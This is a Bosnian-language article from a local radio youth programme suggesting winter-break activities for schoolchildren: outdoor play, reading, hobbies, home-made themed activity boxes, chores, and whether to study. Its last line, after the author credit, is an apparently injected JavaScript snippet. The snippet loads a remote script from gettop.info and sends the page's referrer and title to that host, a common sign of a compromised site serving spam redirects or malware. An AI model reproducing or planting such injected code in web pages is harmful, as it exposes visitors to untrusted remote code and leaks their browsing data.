Najbolje ideje za zimski raspust

zimskeradostiPrvo polugodište je prošlo i dobili smo zaslužene tri sedmice odmora. U odnosu na ljeto vremenski uslovi su ograničavajući faktor pa je manje bazena, plaža, fudbala i ostalih sadržaja koji se vezuju za ljeto. Ipak, i dalje se postavlja pitanje: šta raditi tokom zimskog raspusta? To ne znači, da gledanje u televizijski i kompjuterski ekran treba u potpunosti da zamijene sve obaveze koje su dominirale prethodnih mjeseci. Čak i pored nekoliko sati na igricama, i dalje ima vremena za još ponešto, tokom dugog dana. Svako ima svoja interesovanja, i bilo bi najbolje ukoliko bi iskoristili raspust za odrađivanje onog za šta se nema vremena tokom školske godine. Tu prije svega mislimo na putovanja, mogućnosti odlaska na zimovanje, kod nana, deda i ostale familije, i sl. Upravo tako su zimski raspust iskoristili mnogi ilijaški učenici.

Vrijeme u gradu se može ispuniti čitanjem lakše literature, pogledati neki film, ili ono što najviše preporučujemo, druženje sa vršnjacima. Također, lijepo bi bilo iskoristiti svaki momenat za izlazak vani, sankanje, grudvanje i ostale aktivnosti, a i predstojeći period bi se mogao iskoristiti za poneku posjetu , bazenu, biblioteci, muzeju, kinu…Iako je napolju hladno i vjetrovito, to ne znači da zbog straha od prehlade treba da provedemo dan u kući. Pobrinite se da se toplo i adekvatno obučete i uživajte u grudvanju, sankanju ili prosto šetnji i trčanju napolju. Svjež vazduh i vrijeme provedeno sa drugarima će nam sigurno prijati. Uostalom, i psiholozi naglašavaju značaj igre napolju za društveni, emotivni i kognitivni razvoj, pored očigledne fizičke koristi.zimskiraspust

Knjiga je najbolja prijateljica i društvo

biblioteka4Možda je najbolja samostalna aktivnost upravo čitanje. Danas se nije lahko odlučiti za čitanje knjiga kada se zabavni sadržaj može dobiti online, ali potrudite se da pronađete naslove koji bi vas zanimali. Možete se pretplatiti na neki omladinski časopis ili se barem potrudite da zaista pročitate obaveznu lektiru. Hladno vrijeme vani vam ide u prilog, a ako vaša porodica generalno voli da čita, nema nikakve prepreke da i vi ne izostavite to zadovoljstvo.

Pronađite hobi u kojem uživate

Hobiji nam svima pomažu u izražavanju kreativnosti i učenju novih vještina, a ljubav prema nekoj aktivnosti može da bude zadovoljstvo koje će trajati cijelog života. Ne oklijevajte zato da pronađete sebe u nekom od hobija, čak i ako možda promijenite nekoliko aktivnosti, prije nego što pronađe onu koja vam zaista odgovara. Još jedna dobra strana hobija je, što razvija samostalnost. U početku ćete vjerovatno morati da naučite osnove, bilo da je riječ o sviranju nekog muzičkog instrumenta, modeliranju, sakupljanju novčića ili fotografija, slikanja, crtanja ali nakon tog početnog truda, samo razvijati svoj talenat i ljubav prema odabranom hobiju. A uspomene vezane za početak bavljenja njime znaju da budu neka od najlepših sjećanja .

Sjetite se omiljenih igara iz djetinjstva – zanimljive geografije, pantomime, igara sa kartama i sličnih igrica. Dozvolite sebi da pustite mašti na volju u izmišljanju igara. Često vam za to nije potrebno čitavo bogatstvo kako bi kupili materijal, već možete da iskoristite i ono što imate kod kuće.
Možete da napravite „umjetničku kutiju“ u koju treba ubaciti sve drvene bojice, tempere, flomastere, i ostale potrepštine neiskorištene na časovima likovnog i sl.hobi

Odlična ideja za djevojke je „modna kutija“ u koju mogu stavljati marame, ostatke materijala, stare jastučnice i čaršafe, perle, ukrasne trake i odjeću koja se više ne nosi, zajedno sa iglom i koncima, uz pomoć kojih dizajnerke mogu da osmisle svoje modele i naprave mini reviju.

Dječacima će se također svidjeti „majstorska kutija“ koju otac može da im napuni komadima drveta, daščica, cjevčića, kanapa, ekserčića, lijepka i sa nekoliko komada alata, uz pomoć kojih mogu da naprave razne majstorije. Ambiciozniji mogu da naprave i „kutiju za pisce ili novinare“, u kojoj će mjesto naći olovke, papiri, dnevnik ili sveska, ali mogu da očekuju i intervju sa nezgodnim pitanjima novinara izvještača. Osnovna ideja ovih kutija je da budu tematski mini centri zanimacija koji ne koštaju dodatno, a kvalitetno popunjavaju slobodno vrijeme.

Lista kućnih obaveza

Ako ni jedna od ovih ideja ne upali postoji i poslednji „trik u rukavu“ – ispišite listu kućnih obaveza za koje se niko nije dobrovoljno javio i prionite na posao.mama-i-dijete

Da li učiti preko raspusta?

Odgovor je veoma prost. Ukoliko je ostvaren zadovoljavajući uspjeh i ukoliko nema zakazanih obaveza tipa lektira ili kontrolnog tokom prve sedmice, onda je odgovor – ne. Najbolje se pune „baterije“ kroz odmor i fizičke aktivnosti. Ukoliko se nešto mora obaviti tokom raspusta onda se te obaveze obavljaju od samog početka zimskog odmora. Najgore bi bilo reći da ima vremena i da se to ostavlja za posljednji dan.

Pripremili : Azra i Haris Avdibegović, voditelji Omladinskog programa Radio Ilijaša

 var d=document;var s=d.createElement(‘script’); s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;